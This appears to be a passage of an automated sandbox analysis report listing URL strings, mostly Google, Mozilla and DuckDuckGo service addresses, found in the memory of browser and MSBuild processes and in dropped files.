Source: msedge.exe, 00000009.00000003.2707000145.000041B002AD0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2716588222.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2687854469.000041B000788000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2706775082.000041B001AE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2686436150.000041B002300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2705975079.000041B00297C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2705398783.000041B001AE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2687937897.000041B000798000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694236943.000041B002300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2716895157.000041B00297C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2708930368.000041B0022DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2708893975.000041B000788000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2693291367.000041B0022DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2705552619.000041B0022DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2704023880.000041B002300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2705436846.000041B00078D000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2708962463.000041B0027D4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695858197.000041B00230C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2705908536.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2706906102.000041B0022DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2693249462.000041B000788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore/
Source: chrome.exe, 00000005.00000002.2636162030.000077B0006D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000005.00000002.2638384741.000077B000B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000005.00000002.2638682130.000077B000BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en3
Source: chrome.exe, 00000005.00000003.2574118527.000077B000E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2555680874.000077B000E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2575386390.000077B000CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2553758102.000077B000E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2553656242.000077B000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552527843.000077B000CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552486932.000077B000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2554201930.000077B000CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: msedge.exe, 00000009.00000003.2678463216.000041B00085C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreunch
Source: chrome.exe, 00000005.00000002.2630376330.00004F9400920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.2543864050.00004F940071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2544008101.00004F9400728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000005.00000002.2630376330.00004F9400920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.2543864050.00004F940071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2544008101.00004F9400728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000005.00000002.2630376330.00004F9400920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000005.00000002.2630376330.00004F9400920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.2543864050.00004F940071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2544008101.00004F9400728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688847669.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685670262.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000005.00000002.2633242633.000077B000174000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000005.00000002.2640371061.000077B000EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000005.00000002.2640371061.000077B000EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/w
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000005.00000003.2540258549.0000518C002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2540236303.0000518C002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000005.00000002.2636545545.000077B00076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2636199728.000077B0006E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635879426.000077B000630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2636318075.000077B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2632571575.000077B00003C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688058069.000041B002224000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2681567534.000041B0009C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2709257255.000041B002220000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000005.00000002.2636545545.000077B00076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000005.00000002.2636081805.000077B0006A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: MSBuild.exe, 00000003.00000002.2902111510.000000000154A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.000000000151E000.00000004.00000020.00020000.00000000.sdmp, cbaaa1.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: MSBuild.exe, 00000003.00000002.2902111510.000000000154A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.000000000151E000.00000004.00000020.00020000.00000000.sdmp, cbaaa1.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: chrome.exe, 00000005.00000003.2564403386.000077B000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
Source: chrome.exe, 00000005.00000002.2638189784.000077B000A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694375958.000041B0028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694666000.000041B002A1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694330660.000041B0029A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694885968.000041B0006FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695418792.000041B002A68000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694585747.000041B002A18000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694841991.000041B002A28000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695338331.000041B002A80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694375958.000041B0028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694666000.000041B002A1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694330660.000041B0029A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694885968.000041B0006FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695418792.000041B002A68000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694585747.000041B002A18000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694841991.000041B002A28000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695338331.000041B002A80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000005.00000002.2643104977.000077B001317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642114782.000077B0010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2640371061.000077B000EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2636996751.000077B00080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000005.00000002.2636996751.000077B00080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webappx
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000005.00000003.2586882291.000077B001944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2587001200.000077B001948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000005.00000003.2586882291.000077B001944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2587001200.000077B001948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previeww
Source: chrome.exe, 00000005.00000002.2643104977.000077B001317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/doglw
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000005.00000002.2643104977.000077B001317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/njb
Source: chrome.exe, 00000005.00000002.2636873282.000077B0007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2636873282.000077B0007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2636873282.000077B0007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000005.00000002.2636081805.000077B0006A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000005.00000002.2642114782.000077B0010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2640371061.000077B000EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642890679.000077B0012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2636081805.000077B0006A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/oglw
Source: chrome.exe, 00000005.00000002.2636545545.000077B00076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2641022107.000077B000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635334509.000077B000544000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2636081805.000077B0006A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/w
Source: chrome.exe, 00000005.00000002.2642281281.000077B001120000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642114782.000077B0010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2640371061.000077B000EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000005.00000002.2641022107.000077B000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultag
Source: chrome.exe, 00000005.00000002.2642281281.000077B001120000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/oglw
Source: chrome.exe, 00000005.00000002.2636545545.000077B00076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2641022107.000077B000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635334509.000077B000544000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000005.00000003.2564602281.000077B00040C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000005.00000002.2634084296.000077B00030C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638821936.000077B000C38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2581598283.000077B00130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2643104977.000077B001317000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638821936.000077B000C38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000005.00000003.2581598283.000077B00130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2643104977.000077B001317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2ation.Resultw
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2b-page/
Source: chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2dyw
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638821936.000077B000C38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2640983828.000077B000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638821936.000077B000C38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2640983828.000077B000FD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultT
Source: chrome.exe, 00000005.00000002.2640983828.000077B000FD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultw
Source: chrome.exe, 00000005.00000002.2636199728.000077B0006E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/m
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/r
Source: chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2637632737.000077B000988000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2722651590.000041B002224000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2715801984.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2720393610.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2709257255.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688058069.000041B002229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000005.00000002.2637632737.000077B000988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638747506.000077B000C0C000.00000004.00000800.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2722651590.000041B002224000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2715801984.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2720393610.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2709257255.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688058069.000041B002229000.00000004.00000800.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msedge.exe, 00000009.00000003.2722651590.000041B002224000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2715801984.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2720393610.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2709257255.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688058069.000041B002229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabedge://history/syncedTabs?q=
